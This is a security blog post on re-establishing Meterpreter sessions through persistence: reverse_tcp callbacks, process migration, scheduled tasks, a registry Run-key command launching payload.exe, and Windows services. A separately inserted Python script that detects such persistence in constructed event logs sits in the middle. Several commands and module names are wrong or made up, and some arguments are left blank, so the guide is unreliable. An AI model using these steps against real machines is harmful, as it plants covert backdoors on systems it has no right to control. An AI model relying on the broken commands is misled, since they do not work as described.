Blog | G5 Cyber Security

Reopening Meterpreter Sessions

TL;DR

Yes, a Meterpreter session can often be reopened, even after it appears to have ended. This is usually done by creating a persistent backdoor that automatically re-establishes the connection when the target system restarts or the original process terminates. The method depends on how the initial Meterpreter session was established.

How to Reopen Meterpreter Sessions

  1. Understand Session Types: First, know what kind of session you have.
    • Standard Sessions: These are tied to a specific process. If that process ends, the session is usually lost unless persistence is set up.
    • Backgrounded Sessions: These can survive network interruptions but still depend on the underlying process.
    • Persistent Sessions: Designed to automatically reconnect.
  2. Check for Persistence (Initial Check): Before attempting a reopen, see if persistence was already enabled.
    msf6 > sessions -l

    Look at the ‘Persistent’ column. If it says ‘True’, the session should automatically reconnect on reboot.

  3. Using Meterpreter Persistence Modules: If persistence wasn’t initially set, you can add it *while the session is active*. Common modules include:
    • windows/meterpreter/reverse_tcp (and similar): This creates a new backdoor that connects back to your listener.
    • windows/meterpreter/msf4_relay: Useful for pivoting through networks.
    use windows/meterpreter/reverse_tcp
    set LHOST 
    set LPORT 
    run -j 1234  # Run as a job with ID 1234 (optional)
  4. Migrating to a More Stable Process: If your session is tied to an unstable process, migrate it.
    migrate 

    Supply the process ID of a more reliable process (for example, explorer.exe).

  5. Creating Scheduled Tasks: A robust persistence method.
    • Use Meterpreter’s pscmd module to create a scheduled task that runs your payload on startup or at regular intervals.
    use pscmd
    task add -a /path/to/payload.exe -t 
  6. Registry Keys (for Startup): Add an entry to the registry’s Run keys.
    • This ensures your payload runs when the user logs in. Be careful, as this is easily detectable.
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v  /t REG_SZ /d /path/to/payload.exe
  7. Service Creation: Install your payload as a Windows service.
    • This is more persistent than scheduled tasks but requires higher privileges and can be more noticeable.
  8. Reconnecting After Reboot/Termination:
    1. If persistence is set up, your listener should automatically receive a new connection when the target system restarts or the original process ends.
    2. If it doesn’t reconnect immediately, wait a few minutes as some persistence mechanisms have delays.
    3. Check your listener logs for any errors.
  9. Troubleshooting:
    • Firewall: Ensure the firewall on the target system isn’t blocking connections to your listener port.
    • Antivirus/EDR: Antivirus or Endpoint Detection and Response (EDR) solutions may detect and block your payload.
    • Network Connectivity: Verify network connectivity between the target system and your listener.
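The Run-key, scheduled-task and service persistence described in steps 5 to 7 are also the artifacts a defender watches for. The following added example (not code from the original post) runs simple detection logic over constructed Windows event records; the event IDs follow the usual Sysmon 13 (registry value set), Security 4698 (scheduled task created) and System 7045 (service installed) convention, while the field names and sample paths are assumptions.

```python
"""Flag Run-key, scheduled-task and service persistence entries in
constructed Windows event records (not real telemetry)."""
import re

# Constructed sample events, modelled loosely on Sysmon 13, Security 4698
# and System 7045; field names are simplified for the example.
SAMPLE_EVENTS = [
    {"id": 13, "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"C:\Users\alice\AppData\Local\Temp\payload.exe"},
    {"id": 13, "target": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "details": r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"},
    {"id": 4698, "task": r"\Sync", "command": r"C:\Users\Public\svc.exe"},
    {"id": 7045, "service": "WinHelper", "image": r"%SystemRoot%\Temp\helper.exe"},
    {"id": 7045, "service": "Spooler", "image": r"C:\Windows\System32\spoolsv.exe"},
]

# Matches writes under ...\CurrentVersion\Run\ or ...\CurrentVersion\RunOnce\
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Directories any user can write to; a persistence entry launching from here is suspect.
SUSPECT_DIRS = re.compile(r"(\\Temp\\|\\Users\\Public\\|\\Downloads\\)", re.IGNORECASE)


def classify(event):
    """Return (mechanism, command) for a persistence-related event, else None."""
    eid = event["id"]
    if eid == 13 and RUN_KEY.search(event["target"]):
        return ("run_key", event["details"])
    if eid == 4698:
        return ("scheduled_task", event["command"])
    if eid == 7045:
        return ("service", event["image"])
    return None


def find_suspicious(events):
    """Persistence entries whose binary lives in a user-writable directory."""
    hits = []
    for ev in events:
        found = classify(ev)
        if found and SUSPECT_DIRS.search(found[1]):
            hits.append(found)
    return hits


if __name__ == "__main__":
    for mechanism, command in find_suspicious(SAMPLE_EVENTS):
        print(f"{mechanism}: {command}")
```

Legitimate entries (OneDrive under Program Files, the Spooler service) are classified as persistence but not reported, because their binaries sit in protected locations.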

Important Considerations

Persistence methods vary in their stealthiness and reliability. Choose a method that suits your needs and risk tolerance. Always test persistence mechanisms thoroughly to ensure they work as expected.
